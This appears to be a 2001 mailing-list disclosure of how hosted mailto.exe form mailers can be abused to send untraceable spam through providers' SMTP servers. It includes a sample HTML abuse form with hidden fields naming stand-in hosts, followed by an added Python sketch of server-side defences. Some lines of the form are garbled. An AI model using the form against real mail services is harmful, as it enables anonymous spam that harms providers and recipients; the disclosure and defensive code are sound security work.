Date: Mon Dec 10 2001 - 17:40:25 CST
Monday, December 10, 2001
Forget about open relays. There is an extremely simple mailto form
application called mailto.exe available on the internet. Simply create your
html form, upload the mailto.exe into your cgi bin and fire away.
The problem is, as a courtesy, many ISPs or hosting companies or providers
of other web site 'things' give their clients, in painful detail,
instructions on how to install and use this mailto.exe application.
The BIG problem is that these instructions include the provider's settings,
including their smtp server name and the full path name to their directory
containing mailto.exe, and it actually works!
<FORM ACTION="http://WWW.MALWARE.COM/CGI-BIN/MAILTO.EXE" METHOD="POST">
<INPUT TYPE="hidden" NAME="sendto" VALUE=billgbloatedcorp.com>
<INPUT TYPE="hidden" NAME="email" VALUE="hotsuezzzxxxxxxrated.com">
<INPUT TYPE="hidden" NAME="server" VALUE="smtp.malware.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="SPAM MONGER">
<INPUT TYPE="hidden" NAME="resulturl" VALUE=http://ww.malware.com>
Name: <INPUT NAME="uname" SIZE=30>
Position: <INPUT NAME="title" SIZE=30>
Company: <INPUT NAME="company" SIZE=30>
E-Mail: <INPUT NAME="email" SIZE=30>
Comments:<TEXTAREA name="comments" ROWS=10 COLS=50 SIZE="10"></TEXTAREA>
Press <INPUT TYPE="submit" VALUE="Submit">
Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is
This can be submitted from any desktop html editor / viewer and emails can be
fired away. Because mailto.exe is located on the provider's site (within their
domain), the smtp servers work and all IP addresses are theirs. In other
words, unlike a relay, which can reveal the originating IP address, this
provides for none of that.
Trivial searching with our favorite engine immediately reveals 2 fully
functional sets of provider's instructions, including all their details, which
work exactly as described. No doubt deep searching will yield many many more.
Notes: there does not seem to be a single solution, other than to release
this and urge any and all providers, hosting services and others to be aware
and to remove, or certainly not give out, their working server details.
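
Added example, not part of the original post and not mailto.exe's own code: a sketch of the server-side checks a provider could put in front of a form mailer so that the fields in the sample form above (sendto, server, subject, resulturl) are no longer trusted from the client. The policy values, host names and function names are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Constructed policy values (assumptions); a provider would set these server-side.
ALLOWED_RECIPIENTS = {"webmaster@customer.example"}
ALLOWED_FORM_HOSTS = {"www.customer.example"}
SMTP_SERVER = "smtp.provider.example"  # fixed here, never read from the form
HEADER_FIELDS = ("sendto", "email", "subject")  # names from the sample form


def _host(url):
    """Lower-cased host of a URL, or None if absent or unparseable."""
    try:
        return urlsplit(url or "").hostname
    except ValueError:
        return None


def check_submission(fields, referer):
    """Return (smtp_server, problems); an empty problems list means deliver."""
    problems = []
    # The sample form lets the client choose the SMTP host; refuse that outright.
    if "server" in fields:
        problems.append("client supplied 'server'")
    # Recipient must be one the site owner registered, not whatever was posted.
    if fields.get("sendto", "").strip().lower() not in ALLOWED_RECIPIENTS:
        problems.append("recipient not in allowlist")
    # CR/LF in a value copied into a mail header would allow extra headers.
    for name in HEADER_FIELDS:
        if any(c in fields.get(name, "") for c in "\r\n"):
            problems.append("CR/LF in '%s'" % name)
    # The post-send redirect must stay on the customer's own site.
    if _host(fields.get("resulturl")) not in ALLOWED_FORM_HOSTS:
        problems.append("resulturl is off-site")
    # Referer is client-controlled, so this is only a weak signal: it catches
    # forms saved to a desktop and posted from there.
    if _host(referer) not in ALLOWED_FORM_HOSTS:
        problems.append("form not served from an allowed host")
    return SMTP_SERVER, problems


if __name__ == "__main__":
    # Hidden-field values as they appear in the sample form, posted with no Referer.
    posted = {"sendto": "billgbloatedcorp.com", "server": "smtp.malware.com",
              "subject": "SPAM MONGER", "resulturl": "http://ww.malware.com"}
    for problem in check_submission(posted, None)[1]:
        print("rejected:", problem)
```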